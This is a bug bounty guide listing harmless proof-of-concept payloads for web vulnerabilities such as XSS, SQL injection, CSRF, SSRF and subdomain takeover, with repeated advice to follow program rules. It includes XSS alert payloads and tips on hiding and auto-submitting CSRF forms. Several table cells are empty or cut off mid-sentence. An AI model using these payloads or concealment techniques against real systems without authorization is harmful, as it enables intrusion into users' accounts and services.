I have a little secret for you that will completely change the way you create your proof of concepts: Stick to the rules like a white hat and then, with that in mind, create your proof of concept thinking like a black hat. What I mean by this is always stick by the rules while hunting and then when it comes to demonstrating the impact of the issue, create your proof of concept in a way that highlights how your finding could potentially affect the target. This does not always work and definitely does not mean you should start escalating the issue and gaining unauthorised access. This simply signifies that you need to understand what the real potential impact is of your finding and then work according to the program's rules in order to create something really clever which could actually work in a real-world scenario. You can see this mindset in action in this report.
This is a mega list of proof of concepts (PoCs) for you to use when demonstrating the impact of your issue. The PoCs are designed so that the bug bounty program can quickly understand the issue and to ensure you do not harm any of their users or services in the process. That being said, always follow the rules on the program's policy; the program's security policy always takes precedence over the list.
Issue type | PoC |
---|---|
Cross-site scripting | alert(document.domain) or setInterval`alert\x28document.domain\x29` if you have to use backticks. [1] Using document.domain instead of alert(1) can help avoid reporting XSS bugs in sandbox domains, as described on the Google Bughunter University site. |
Command execution | This involves the execution of arbitrary commands on a target server. Check the program security policy as specific commands may be designated for testing. For example, this set of primitives is set by Yahoo to ensure researchers "minimise the mayhem."
|
Code execution | This involves the manipulation of a web app such that server-side code (e.g. PHP) is executed.
|
SQL injection |
If column values can be influenced, simply grabbing the SQL server version with the following payloads should be enough to demonstrate basic SQL injection capability.
|
Unvalidated redirect |
|
Information exposure | Data exposure manifests in a variety of forms. Researchers should use self-created test accounts (or those provisioned by the program you're working on). Let's say you're looking for an IDOR vulnerability — which in this example is an endpoint allowing you to iterate over an ID parameter (e.g. ?id=1337 ) to disclose another user's information.
Investigate only with the IDs of your own test accounts — do not leverage the issue against other users' data — and describe your full reproduction process in the report. |
Cross-site request forgery |
After you've confirmed the presence of a CSRF bug — ensuring there are no leftover token or once-only values — either attach a file to demonstrate your proof of concept or paste the code in a code block in your report.
When designing a real-world example, either hide the form (style="display:none;" ) and make it submit automatically, or design it so that it resembles a component from the target's page.
|
Server-side request forgery | The "How To" article from HackerOne is an excellent introduction to SSRF. As Jobert explains, webhooks, parsers, and PDF generator features are often vulnerable. The impact of a SSRF bug will vary — a non-exhaustive list of proof of concepts includes:
|
Local and remote file inclusion | Local inclusion allows you to. Remote inclusion allows you to. |
Local file read | This only allows you to read files located on the target system. Make sure to only retrieve a harmless file. Check the program security policy as a specific file may be designated for testing. |
XML external entity processing |
Output random harmless data. [3]
|
Sub-domain takeover | Claim the sub-domain discreetly and serve a harmless file on a hidden page. Do not serve content on the index page. You may use the proof of concept found here. |